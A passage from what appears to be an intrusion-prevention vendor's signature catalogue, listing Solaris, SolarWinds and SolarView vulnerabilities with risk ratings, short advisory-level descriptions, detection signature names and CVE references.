There is a vulnerability in the Solaris Answerbook web server. The vulnerability allows remote attackers to execute arbitrary commands via encoded % characters in an HTTP request.

Situation:

References:

CVE-1999-1417
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1417

BID-253
http://www.securityfocus.com/bid/253

OSVDB-10882
http://www.osvdb.org/10882

Solaris-BIND-Inverse-Query-BO

About this vulnerability:

Inverse Query Buffer Overflow in BIND 4.9

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Solaris

Software:

BIND

Type:

Buffer Overflow

Description:

The BIND DNS daemon contains a buffer overflow vulnerability that is exploitable via inverse query. Once exploited, the attacker may be able to execute arbitrary code as the user under which the MDNS daemon is being run. This user is most likely "root".

Situation:

DNS-TCP_Sparc-BOF

References:

CVE-1999-0009
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0009

BID-134
http://www.securityfocus.com/bid/134

Solaris-Rwalld-RPC-Call-Format-String-Vulnerability

About this vulnerability:

Syslog format string vulnerability in rpc.rwalld.

Risk:

Critical

First detected in:

sgpkg-ips-93-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Sun Solaris 2.6; Solaris 7; Solaris 8; Solaris 9

Software:

rpc.rwalld

Type:

Format String

Description:

An insecure syslog call in rpc.rwalld can be exploited by an attacker to execute arbitrary commands with administrator privileges.

Situation:

Generic_UDP-Solaris-Rwalld-RPC-Call-Format-String

References:

CVE-2002-0573
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0573

BID-4639
http://www.securityfocus.com/bid/4639

OSVDB-778
http://www.osvdb.org/778

Solaris-sadmind-Auth-Sys-System-Compromise

About this vulnerability:

Sun Solaris contains a remote system compromise flaw

Risk:

High

First detected in:

sgpkg-ips-13-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Solaris 8; Solaris 9

Software:

<os>

Type:

Malfunction

Description:

The default installation of sadmind on Solaris uses weak authentication (AUTH_SYS). A remote attacker could send a specially crafted Remote Procedure Call (RPC) packet and may be able to forge the AUTH_SYS credentials. This would allow the execution of arbitrary commands with root privileges.

Situation:

Generic_Solaris-sadmind-Weak-Authentication

References:

CVE-2003-0722
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0722

BID-8615
http://www.securityfocus.com/bid/8615

OSVDB-4585
http://www.osvdb.org/4585

Solaris-SnmpXdmid-Malformed-DMI-Request-BOF

About this vulnerability:

Bufffer overflow in Solaris snmpXdmid daemon

Risk:

High

First detected in:

sgpkg-ips-370-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Solaris

Software:

snmpXdmid

Type:

Buffer Overflow

Description:

Sun Solaris is vulnerable to a buffer overflow in the snmpXdmid daemon. The 'snmpXdmid' service is a mapping tool for SNMP and DMI (Desktop Management Interface) requests and is installed with root privileges. By causing the snmpXdmid daemon to translate a malformed DMI request into an SNMP trap, a remote attacker can overflow a buffer to gain root access to the system.

Situation:

Generic_SunRPC-SnmpXdmid-Exploit-Detected
SunRPC_SnmpXdmid-Detected

References:

CVE-2001-0236
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0236

BID-2417
http://www.securityfocus.com/bid/2417

OSVDB-546
http://www.osvdb.org/546

Solaris-Telnet-Passwordless-Remote-Access

About this vulnerability:

A critical flaw allows remote logins to any account without password

Risk:

High

First detected in:

sgpkg-ips-95-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Solaris 10; Solaris 11

Software:

Generic telnet server

Type:

Malfunction

Description:

The Solaris telnet daemon has a vulnerability that allows a remote attacker to log in into any account without knowing the password. Administrative accounts such as root, sys, and bin are also vulnerable.

Situation:

Telnet_CCS-Solaris-Telnet-Passwordless-Remote-Access

References:

CVE-2007-0882
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0882

BID-22512
http://www.securityfocus.com/bid/22512

OSVDB-31881
http://www.osvdb.org/31881

Solarview-Compact-Command-Injection-CVE-2022-29303

About this vulnerability:

A vulnerability in SolarView Compact

Risk:

High

First detected in:

sgpkg-ips-1529-5242

Last changed:

sgpkg-ips-1529-5242

Platform:

Generic

Software:

SolarView

Type:

Input Validation

Description:

A command injection vulnerability has been reported in SolarView Compact 6.0. An unauthenticated remote attacker can use this vulnerability to execute arbitrary commands.

Situation:

HTTP_CRL-Solarview-Compact-Command-Injection-CVE-2022-29303

References:

CVE-2022-29303
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29303

Solarview-Compact-Command-Injection-CVE-2023-23333

About this vulnerability:

A vulnerability in SolarView Compact

Risk:

High

First detected in:

sgpkg-ips-1625-5242

Last changed:

sgpkg-ips-1625-5242

Platform:

Generic

Software:

SolarView

Type:

Input Validation

Description:

A command injection vulnerability has been reported in SolarView Compact 6.0 and earlier. An unauthenticated remote attacker can use this vulnerability to execute arbitrary commands.

Situation:

HTTP_CRL-Solarview-Compact-Command-Injection-CVE-2023-23333

References:

CVE-2023-23333
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23333

Solarwinds-Access-Rights-Manager-Insecure-Deserialization-CVE-2024-23478

About this vulnerability:

A vulnerability in SolarWinds Access Rights Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1728-5242

Last changed:

sgpkg-ips-1728-5242

Platform:

Generic

Software:

SolarWinds Access Rights Manager

Type:

Input Validation

Description:

An insecure deserialization vulnerability exists in SolarWinds Access Rights Manager. The vulnerability is due to lack of input validation leading to insecure deserialization in JsonSerializationBinder class. A remote, authenticated attacker could exploit the vulnerability by sending crafted HTTP requests to the target server. Successful exploitation can result in arbitrary code execution on the target server under the security context of IIS AppPool.

Situation:

File-Text_Solarwinds-Access-Rights-Manager-Insecure-Deserialization-CVE-2024-23478

References:

CVE-2024-23478
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23478

Solarwinds-Access-Rights-Manager-Insecure-Deserialization-CVE-2024-28075

About this vulnerability:

A vulnerability in SolarWinds Access Rights Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1731-5242

Last changed:

sgpkg-ips-1731-5242

Platform:

Generic

Software:

SolarWinds Access Rights Manager

Type:

Input Validation

Description:

Situation:

File-Text_Solarwinds-Access-Rights-Manager-Insecure-Deserialization-CVE-2024-28075

References:

CVE-2024-28075
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28075

Solarwinds-Dameware-Mini-Remote-Control-CltDHPubKeyLen-Out-of-Bounds-Read

About this vulnerability:

A vulnerability in SolarWinds DameWare Mini Remote Control

Risk:

High

First detected in:

sgpkg-ips-1189-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

DameWare Mini Remote Control

Type:

Input Validation

Description:

A vulnerability in SolarWinds DameWare Mini Remote Control, versions 12.1.0.34 and prior, which allows remote attackers to cause an out of bounds read by sending a specially crafted message to the target system, due to a user controlled loop counter via the CltDHPubKeyLen parameter.

Situation:

Generic_CS-Solarwinds-Dameware-Mini-Remote-Control-CltDHPubKeyLen-Out-of-Bounds-Read

References:

CVE-2019-3956
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3956

Solarwinds-Dameware-Mini-Remote-Control-Rsapubkeylen-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in SolarWinds DameWare Mini Remote Control

Risk:

Moderate

First detected in:

sgpkg-ips-1183-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

DameWare Mini Remote Control

Type:

Input Validation

Description:

There has been reported a heap buffer overflow vulnerability in SolarWinds DameWare Mini Remote Control. This vulnerability could be exploited remotely by an unauthenticated user. Successful exploitation could lead in arbitrary code execution.

Situation:

Generic_CS-Solarwinds-Dameware-Mini-Remote-Control-Rsapubkeylen-Heap-Buffer-Overflow

References:

CVE-2019-3955
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3955

Solarwinds-Dameware-Mini-Remote-Control-RsaSignatureLen-Out-of-Bounds-Read

About this vulnerability:

A vulnerability in SolarWinds DameWare Mini Remote Control

Risk:

High

First detected in:

sgpkg-ips-1188-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

DameWare Mini Remote Control

Type:

Input Validation

Description:

A vulnerability in SolarWinds DameWare Mini Remote Control, versions 12.1.0.34 and before, which allows remote attackers to cause an out of bounds read by sending a specially crafted message to the target system, due to a user controlled loop counter via the RsaSignatureLen parameter.

Situation:

Generic_CS-Solarwinds-Dameware-Mini-Remote-Control-RsaSignatureLen-Out-of-Bounds-Read

References:

CVE-2019-3957
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3957

Solarwinds-Dameware-Sigpubkey-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in SolarWinds DameWare

Risk:

Moderate

First detected in:

sgpkg-ips-1246-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

DameWare Mini Remote Control

Type:

Buffer Overflow

Description:

There has been reported a pre-auth heap buffer overread and overflow vulnerability in SolarWinds DameWare. Successful exploitation could lead in denial of service conditions on the target server.

Situation:

Generic_CS-Solarwinds-Dameware-Sigpubkey-Heap-Buffer-Overflow

References:

CVE-2020-5734
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5734

Solarwinds-Firewall-Security-Manager-Userlogin.jsp-Policy-Bypass

About this vulnerability:

A vulnerability in SolarWinds Firewall Security Manager

Risk:

Moderate

First detected in:

sgpkg-ips-635-5211

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

SolarWinds Firewall Security Manager

Type:

Malfunction

Description:

A policy bypass vulnerability exists in SolarWinds Firewall Security Manager. The vulnerability is due to a design weakness in the userlogin.jsp page which sets the "username" session value to a user supplied value prior to authentication. A remote unauthenticated attacker could exploit this vulnerability by sending a specially crafted request to the vulnerable page. Successful exploitation could lead to a policy bypass condition on the server.

Situation:

HTTP_CSU-Solarwinds-Firewall-Security-Manager-Userlogin.jsp-Policy-Bypass

References:

CVE-2015-2284
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2284

OSVDB-119559
http://www.osvdb.org/119559

Solarwinds-Log-And-Event-Manager-Static-Credentials

About this vulnerability:

A vulnerability in SolarWinds Log & Event Manager

Risk:

Moderate

First detected in:

sgpkg-ips-605-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SolarWinds Log and Event Manager

Type:

Malfunction

Description:

A policy bypass vulnerability exists in SolarWinds Log and Event Manager. The vulnerability is due to the usage of static/default credentials to access the HyperSQL database. A remote attacker can exploit this vulnerability to access the database with administrator privileges. Once accessed, the attacker can read and write information in the database which can lead to remote code execution in the context of the database.

Situation:

Generic_CS-Solarwinds-Log-And-Event-Manager-Static-Credentials

References:

CVE-2014-5504
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5504

OSVDB-110872
http://www.osvdb.org/110872

Solarwinds-Network-Configuration-Manager-Arbitrary-File-Write

About this vulnerability:

A vulnerability in SolarWinds Network Configuration Manager

Risk:

High

First detected in:

sgpkg-ips-1316-5242

Last changed:

sgpkg-ips-1481-5242

Platform:

Generic

Software:

SolarWinds Network Configuration Manager

Type:

Input Validation

Description:

An arbitrary file write vulnerability has been reported in SolarWinds Network Configuration Manager. The vulnerability is due to insufficient validation of file types for vulnerability announcement data files in VulnerabilitySettings.aspx, combined with a lack of restriction on destination paths. A remote, authenticated attacker can exploit this vulnerability by submitting a crafted request to the target server. Successful exploitation results in the writing of an arbitrary file to a location chosen by the attacker, potentially leading to execution of arbitrary code as SYSTEM.

Situation:

File-Text_Solarwinds-Network-Configuration-Manager-Arbitrary-File-Write
HTTP_CRL-Solarwinds-Network-Configuration-Manager-Arbitrary-File-Write

References:

CVE-2020-27871
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27871

Solarwinds-Network-Performance-Monitor-CVE-2022-38111-Insecure-Deserialization

About this vulnerability:

A vulnerability in SolarWinds Network Performance Monitor (NPM)

Risk:

High

First detected in:

sgpkg-ips-1610-5242

Last changed:

sgpkg-ips-1610-5242

Platform:

Generic

Software:

SolarWinds Network Performance Monitor (NPM)

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported in SolarWinds Network Performance Monitor (NPM). The vulnerability is due to insecure deserialization from TextFormattingRunProperties class. A remote, authenticated attacker could exploit the vulnerability by sending crafted requests to the target server. Successful exploitation can result in arbitrary code execution under the security context of SYSTEM.

Situation:

Generic_CS-Solarwinds-Network-Performance-Monitor-CVE-2022-38111-Insecure-Deserialization

References:

CVE-2022-38111
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38111

Solarwinds-Network-Performance-Monitor-CVE-2022-47503-Insecure-Deserialization

About this vulnerability:

A vulnerability in SolarWinds Platform

Risk:

High

First detected in:

sgpkg-ips-1605-5242

Last changed:

sgpkg-ips-1605-5242

Platform:

Generic

Software:

SolarWinds Network Performance Monitor (NPM)

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported in SolarWinds Network Performance Monitor. The vulnerability is due to insecure deserialization from WorkerControllerWCFProxy class. A remote, authenticated attacker could exploit the vulnerability by sending crafted requests to the target server. Successful exploitation can result in arbitrary code execution under the security context of SYSTEM.

Situation:

Generic_CS-Solarwinds-Network-Performance-Monitor-CVE-2022-47503-Insecure-Deserialization

References:

CVE-2022-47503
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-47503

Solarwinds-Network-Performance-Monitor-CVE-2023-23836-Insecure-Deserialization

About this vulnerability:

A vulnerability in SolarWinds Network Performance Monitor (NPM)

Risk:

High

First detected in:

sgpkg-ips-1623-5242

Last changed:

sgpkg-ips-1623-5242

Platform:

Generic

Software:

SolarWinds Network Performance Monitor (NPM)

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported in SolarWinds Network Performance Monitor (NPM). The vulnerability is due to insecure deserialization from CredentialInitializer class. A remote, authenticated attacker could exploit the vulnerability by sending crafted requests to the target server. Successful exploitation can result in arbitrary code execution on the target server, in the worst case, under the security context of SYSTEM.

Situation:

Generic_CS-Solarwinds-Network-Performance-Monitor-CVE-2023-23836-Insecure-Deserialization

References:

CVE-2023-23836
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23836

Solarwinds-Network-Performance-Monitor-Fromjson-Insecure-Deserialization

About this vulnerability:

A vulnerability in SolarWinds Network Performance Monitor (NPM)

Risk:

Moderate

First detected in:

sgpkg-ips-1366-5242

Last changed:

sgpkg-ips-1366-5242

Platform:

Generic

Software:

SolarWinds Network Performance Monitor (NPM)

Type:

Input Validation

Description:

The SolarWinds.Serialization library does not properly validate incoming data, which causes a deserialization vulnerability that allows a remote attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Solarwinds-Network-Performance-Monitor-Fromjson-Insecure-Deserialization

References:

CVE-2021-31474
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31474

Solarwinds-Network-Performance-Monitor-Sqlfilescript-Insecure-Deserialization

About this vulnerability:

A vulnerability in SolarWinds Platform

Risk:

Moderate

First detected in:

sgpkg-ips-1603-5242

Last changed:

sgpkg-ips-1603-5242

Platform:

Generic

Software:

SolarWinds Network Performance Monitor (NPM)

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported in SolarWinds Network Performance Monitor. The vulnerability is due to insecure deserialization from SqlFileScript class. A remote, authenticated attacker could exploit the vulnerability by sending crafted requests to the target server. Successful exploitation can result in arbitrary file read and information disclosure. If combined with other attack vectors, it could result in remote code execution under the security context of SYSTEM.

Situation:

Generic_CS-Solarwinds-Network-Performance-Monitor-Sqlfilescript-Insecure-Deserialization

References:

CVE-2022-47504
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-47504

Solarwinds-Network-Performance-Monitor-Updateactionsdescriptions-SQL-Injection

About this vulnerability:

A vulnerability in SolarWinds Network Performance Monitor (NPM)

Risk:

Moderate

First detected in:

sgpkg-ips-1545-5242

Last changed:

sgpkg-ips-1545-5242

Platform:

Generic

Software:

SolarWinds Network Performance Monitor (NPM)

Type:

Input Validation

Description:

Improper validation of data submitted to the UpdateActionsDescriptions API endpoint causes an SQL injection vulnerability in SolarWinds Network Performance Monitor. A successful exploit allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Solarwinds-Network-Performance-Monitor-Updateactionsdescriptions-SQL-Injection

References:

CVE-2022-36961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36961

Solarwinds-NPM-BytesToMessage-Insecure-Deserialization

About this vulnerability:

A vulnerability in SolarWinds Network Performance Monitor.

Risk:

High

First detected in:

sgpkg-ips-1554-5242

Last changed:

sgpkg-ips-1554-5242

Platform:

Generic

Software:

SolarWinds Network Performance Monitor (NPM)

Type:

Input Validation

Description:

A vulnerability in SolarWinds Network Performance Monitor, in SolarWinds Network Performance Monitor (NPM) 2022.3 and prior, and SolarWinds Orion Platform 2020.2.6 HF5 and prior, which allows remote attackers to execute arbitrary code on the target system under the security context of SYSTEM by sending crafted requests, due to insufficient validation of user-supplied data in BytesToMessage function.

Situation:

Generic_CS-Solarwinds-NPM-BytesToMessage-Insecure-Deserialization

References:

CVE-2022-38108
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38108

Solarwinds-NPM-DeserializeFromStrippedXml-Insecure-Deserialization

About this vulnerability:

A vulnerability in SolarWinds Network Performance Monitor.

Risk:

High

First detected in:

sgpkg-ips-1554-5242

Last changed:

sgpkg-ips-1554-5242

Platform:

Generic

Software:

SolarWinds Network Performance Monitor (NPM)

Type:

Input Validation

Description:

Situation:

HTTP_CRL-Solarwinds-NPM-DeserializeFromStrippedXml-Insecure-Deserialization

References:

CVE-2022-36958
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36958

Solarwinds-NPM-Propertybagjsonconverter-Insecure-Deserialization

About this vulnerability:

A vulnerability in SolarWinds Network Performance Monitor (NPM)

Risk:

High

First detected in:

sgpkg-ips-1570-5242

Last changed:

sgpkg-ips-1570-5242

Platform:

Generic

Software:

SolarWinds Network Performance Monitor (NPM); SolarWinds Orion

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported in SolarWinds Network Performance Monitor. The vulnerability is due to insufficient validation of user-supplied data in the PropertyBagJsonConverter class. A remote, authenticated attacker could exploit the vulnerability by sending crafted requests to the target server. Successful exploitation can result in arbitrary code execution under the security context of SYSTEM.

Situation:

Generic_CS-Solarwinds-NPM-Propertybagjsonconverter-Insecure-Deserialization

References:

CVE-2022-36957
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36957

Solarwinds-Orion-Ipam-Reflected-Cross-Site-Scripting

About this vulnerability:

A vulnerability in SolarWinds Orion IPAM

Risk:

Moderate

First detected in:

sgpkg-ips-499-5211

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

SolarWinds Orion IPAM

Type:

Input Validation

Description:

A reflected cross-site scripting vulnerability has been found in SolarWinds Orion IPAM's web interface. The vulnerability is due to insufficient sanitization of user-supplied input, which is echoed back to the user. An attacker can exploit this issue to inject HTML and script code, which will be executed in the target user's browser in the security context of the vulnerable site.

Situation:

HTTP_CRL-Solarwinds-Orion-Ipam-Reflected-Cross-Site-Scripting

References:

CVE-2012-4939
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4939

BID-56342
http://www.securityfocus.com/bid/56342

OSVDB-86801
http://www.osvdb.org/86801

Solarwinds-Orion-NPM-Remote-Code-Execution

About this vulnerability:

A vulnerability in SolarWinds Orion NPM

Risk:

High

First detected in:

sgpkg-ips-1145-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SolarWinds Network Performance Monitor (NPM)

Type:

Insecure Configuration

Description:

A vulnerability in SolarWinds Orion NPM, verions prior to 12.4, which allows remote attackers to execute arbitrary code as SYSTEM by sending a crafted request to the OrionModuleEngine service.

Situation:

Generic_CS-Solarwinds-Orion-NPM-Remote-Code-Execution

References:

CVE-2019-8917
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8917

Solarwinds-Orion-Patch-Manager-Chart-Insecure-Deserialization

About this vulnerability:

A vulnerability in SolarWinds Patch Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1404-5242

Last changed:

sgpkg-ips-1404-5242

Platform:

Generic

Software:

SolarWinds Patch Manager

Type:

Input Validation

Description:

Insufficient input validation if the contents of the tp parameter of the Chart.ashx endpoint causes an insecure deserialization vulnerability in SolarWinds Patch Manager. A successful exploit allows an attacker to execute code under the security context of NETWORK SERVICE.

Situation:

HTTP_CSU-Solarwinds-Orion-Patch-Manager-Chart-Insecure-Deserialization

References:

CVE-2021-35218
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35218

Solarwinds-Orion-Patch-Manager-Edittopxx-Insecure-Deserialization

About this vulnerability:

A vulnerability in SolarWinds Patch Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1408-5242

Last changed:

sgpkg-ips-1408-5242

Platform:

Generic

Software:

SolarWinds Patch Manager

Type:

Input Validation

Description:

Insufficient input validation of the ThwackData parameter in the EditTopXX.aspx endpoint causes a deserialization vulnerability in Solarwinds Patch Manager.

Situation:

HTTP_CRL-Solarwinds-Orion-Patch-Manager-Edittopxx-Insecure-Deserialization

References:

CVE-2021-35216
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35216

Solarwinds-Orion-Patch-Manager-Wsasyncexecutetasks.aspx-Insecure-Deserialization

About this vulnerability:

A vulnerability in SolarWinds Patch Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1409-5242

Last changed:

sgpkg-ips-1409-5242

Platform:

Generic

Software:

SolarWinds Patch Manager

Type:

Input Validation

Description:

There is an insecure deserialization vulnerability in the Patch Manager Web Console of the SolarWinds Orion Platform. Successful exploitation could lead in arbitrary code execution.

Situation:

HTTP_CRL-Solarwinds-Orion-Patch-Manager-Wsasyncexecutetasks.aspx-Insecure-Deserialization

References:

CVE-2021-35217
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35217

Solarwinds-Orion-Pepco32c-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A vulnerability in Gigasoft ProEssentials v5 Pro

Risk:

Moderate

First detected in:

sgpkg-ips-546-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Gigasoft ProEssentials; SolarWinds Server and Application Monitor

Type:

Buffer Overflow

Description:

There is a heap-based buffer overflow vulnerability in SolarWinds Orion Server and Application Monitor. The vulnerability is due to insufficient bounds checking on the PEstrarg1 parameter of the Pepco32c control. The application copies the parameter into a fixed size buffer, which can be overflowed. The vulnerable ActiveX control is part of the Gigasoft ProEssentials library embedded in SolarWinds Orion to provide charting functionality. A remote unauthenticated attacker can exploit this vulnerability by enticing a user to visit a malicious website. Successful exploitation could allow arbitrary code execution within security context of the target user. The vendor, SolarWinds, has not released a patch for this vulnerability at the time of writing.

Situation:

File-Text_Solarwinds-Orion-Pepco32c-ActiveX-Control-Buffer-Overflow

References:

BID-62585
http://www.securityfocus.com/bid/62585

OSVDB-97661
http://www.osvdb.org/97661

Solarwinds-Orion-Platform-Authentication-Bypass

About this vulnerability:

A vulnerability in SolarWinds Orion Platform

Risk:

Moderate

First detected in:

sgpkg-ips-1313-5242

Last changed:

sgpkg-ips-1313-5242

Platform:

Generic

Software:

SolarWinds Orion

Type:

Malfunction

Description:

Improper URL path handling causes an authentication bypass vulnerability in SolarWinds Orion. A successful exploit allows an attacker to access privileged API endpoints.

Situation:

HTTP_CSU-Solarwinds-Orion-Platform-Authentication-Bypass

References:

CVE-2020-10148
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10148

Solarwinds-Orion-Platform-MSMQ-Insecure-Deserialization

About this vulnerability:

A vulnerability in SolarWinds Orion Platform

Risk:

High

First detected in:

sgpkg-ips-1323-5242

Last changed:

sgpkg-ips-1323-5242

Platform:

Generic

Software:

SolarWinds Orion

Type:

Input Validation

Description:

A insecure deserialization vulnerability has been reported in SolarWinds Orion, the core platform for multiple SolarWinds products. The vulnerability is due to insufficient validation of messages sent to the MSMQ message queue. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the target system. Successful exploitation results in remote code execution under the security context as SYSTEM.

Situation:

Generic_CS-Solarwinds-Orion-Platform-MSMQ-Insecure-Deserialization

References:

CVE-2021-25274
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25274

Solarwinds-Orion-Platform-Rendercontrol-Insecure-Deserialization

About this vulnerability:

A vulnerability in SolarWinds Orion

Risk:

Moderate

First detected in:

sgpkg-ips-1401-5242

Last changed:

sgpkg-ips-1401-5242

Platform:

Generic

Software:

SolarWinds Orion

Type:

Input Validation

Description:

Improper validation of incoming JSON data causes a deserialization vulnerability in multiple SolarWinds products. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

File-Text_Solarwinds-Orion-Platform-Rendercontrol-Insecure-Deserialization

References:

CVE-2021-35215
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35215

Solarwinds-Security-Event-Manager-Amf-Insecure-Deserialization

About this vulnerability:

A vulnerability in SolarWinds Security Event Manager

Risk:

High

First detected in:

sgpkg-ips-1706-5242

Last changed:

sgpkg-ips-1706-5242

Platform:

Generic

Software:

SolarWinds Security Event Manager

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported for SolarWinds Security Event Manager. This vulnerability is due to improper input validation in the AMF endpoints. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in remote code execution in the context of the service account.

Situation:

HTTP_CS-Solarwinds-Security-Event-Manager-Amf-Insecure-Deserialization

References:

CVE-2024-0692
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-0692

Solarwinds-Serv-U-Directory-Traversal-CVE-2024-28995

About this vulnerability:

An attempt to exploit a vulnerability in SolarWinds Serv-U FTP Server detected

Risk:

High

First detected in:

sgpkg-ips-1738-5242

Last changed:

sgpkg-ips-1738-5242

Platform:

Generic

Software:

SolarWinds Serv-U FTP Server

Type:

Input Validation

Description:

SolarWinds Serv-U was susceptible to a directory transversal vulnerability that would allow access to read sensitive files on the host machine.

Situation:

HTTP_CSU-Solarwinds-Serv-U-Directory-Traversal-CVE-2024-28995

References:

CVE-2024-28995
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28995

Solarwinds-Serv-U-FTP-Server-SSH-AES-NEWKEYS-Uninitialized-Memory-Use

About this vulnerability:

A vulnerability in SolarWinds Serv-U FTP Server.

Risk:

High

First detected in:

sgpkg-ips-1441-5242

Last changed:

sgpkg-ips-1441-5242

Platform:

Generic

Software:

SolarWinds Serv-U FTP Server

Type:

Malfunction

Description:

A vulnerability in the SSH component of SolarWinds Serv-U FTP Server and Managed File Transfer, FTP Server prior to 15.2.3 Hotfix 2, Managed File Transfer prior to 15.2.3 Hotfix 2, which allows remote attackers to execute arbitrary code by sending crafted messages to the target server, due to the improper handling of NEWKEYS messages when using the AES encryption algorithm.

Situation:

SSH_CS-Solarwinds-Serv-U-FTP-Server-SSH-AES-NEWKEYS-Uninitialized-Memory-Use

References:

CVE-2021-35211
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35211

Solarwinds-Serv-U-FTP-Server-User_Full_Name-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in SolarWinds Serv-U FTP Server

Risk:

Moderate

First detected in:

sgpkg-ips-1213-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SolarWinds Serv-U FTP Server

Type:

Input Validation

Description:

There exists a pre-auth stored cross-site scripting vulnerability in the SolarWinds Serv-U FTP Server. Successful exploitation could lead in arbitrary script execution.

Situation:

HTTP_CRL-Solarwinds-Serv-U-FTP-Server-User_Full_Name-Stored-Cross-Site-Scripting

References:

CVE-2019-13182
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13182

Solarwinds-Server-And-Application-Monitor-Loadextensionfactory-Code-Execution

About this vulnerability:

A vulnerability in SolarWinds Server and Application Monitor

Risk:

High

First detected in:

sgpkg-ips-672-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SolarWinds Server and Application Monitor

Type:

Browser

Description:

A code execution vulnerability exists in SolarWinds Server and Application Monitor. The vulnerability is due to insufficient validation in loadExtensionFactory() of a 'factory' object. A remote unauthenticated attacker can exploit the vulnerability by enticing a target user to visit a malicious website. Successful exploitation could allow arbitrary code execution within the security context of the affected process.

Situation:

File-Text_Solarwinds-Server-And-Application-Monitor-Loadextensionfactory-Multiple-Vulnerabilities

References:

CVE-2015-1501
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1501

BID-72601
http://www.securityfocus.com/bid/72601

Solarwinds-Server-And-Application-Monitor-Loadextensionfactory-Stack-BO

About this vulnerability:

A vulnerability in SolarWinds Orion Server & Application Monitor

Risk:

Low

First detected in:

sgpkg-ips-634-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SolarWinds Server and Application Monitor

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in SolarWinds Server and Application Monitor. The vulnerability is due to insufficient validation in loadExtensionFactory() of a 'factory' object. A remote unauthenticated attacker can exploit the vulnerability by enticing a target user to visit a malicious website. Successful exploitation could allow arbitrary code execution within the security context of the affected process.

Situation:

File-Text_Solarwinds-Server-And-Application-Monitor-Loadextensionfactory-Multiple-Vulnerabilities

References:

CVE-2015-1500
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1500

OSVDB-118197
http://www.osvdb.org/118197

